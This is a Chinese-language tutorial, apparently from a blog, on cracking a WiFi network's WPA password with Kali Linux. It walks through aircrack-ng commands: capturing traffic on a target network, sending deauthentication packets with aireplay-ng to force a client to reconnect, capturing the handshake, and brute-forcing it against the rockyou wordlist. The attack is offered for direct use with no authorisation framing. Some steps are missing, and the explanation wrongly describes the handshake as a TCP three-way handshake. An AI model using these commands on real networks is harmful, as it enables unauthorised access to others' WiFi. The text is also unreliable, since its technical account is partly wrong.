前期 需要将kali安装好,并且有无线网卡(注意kali支持芯片为3070和1887L的网卡)
打开kali,打开终端,使用命令ifconfig查看网卡信息,若有wlan0表示网卡连接成功
,ESSID为wifi的名称,中文可能会有乱码
airodump-ng wlan0mon–bssid BSSID -c 信道频率 -w /抓包存储的路径/包名
新打开一个终端输入 aireplay-ng -0 20 -a 目标机地址-c 连接目标机的地址 网卡名
当出现WPA handshake时,表示抓包成功
WiFi设备无限次数,-0 8则攻击8次。攻击原理是:先让设备掉线,设备会再自动连接,并发这个自动连接过程会进行三次握手,会发送tcp包(里面包含加密的密码数据),我方伪装成WiFi热点去窃取该数据包。我方窃取后即可用字典穷举法暴力破解加密的WiFi密码,数据包里面的密码是哈希加密的,哈希加密只能正向)
终端可以按ctrl+C停止任务
7.抓到包后,就可以停止监听了,
命令 airmon-ng stop wlan0mon
8.解压自带的密码包,命令如下
gzip -d /usr/share/wordlists/rockyou.txt.gz
9.破解,使用命令
aircrack-ng -w 字典路径 握手包路径
(注意,两路径之间有空格)
例如:
aircrack-ng -w /usr/share/wordlists/rockyou.txt /root/桌面/包名
10.若找不到文件,可按下方找找
